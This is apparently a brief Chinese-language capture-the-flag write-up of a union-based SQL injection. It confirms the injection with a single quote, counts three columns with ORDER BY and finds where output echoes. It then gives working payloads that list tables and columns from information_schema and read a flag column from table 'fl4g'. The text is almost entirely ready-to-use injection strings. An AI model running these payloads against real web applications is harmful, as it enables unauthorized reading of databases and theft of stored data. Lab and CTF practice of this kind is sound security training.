直接单引号报错,存在注入
查看字段
order by 4 的时候报错,说明有3个字段
查看回显位置
暴库,暴用户名
暴表?id=-1' union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 0,1--+
爆字段
?id=-1' union select 1,column_name,3 from information_schema.columns where table_schema=database() and table_name='fl4g' limit 0,1--+
读内容
?id=-1' union select 1,fllllag,3 from note.fl4g limit 0,1--+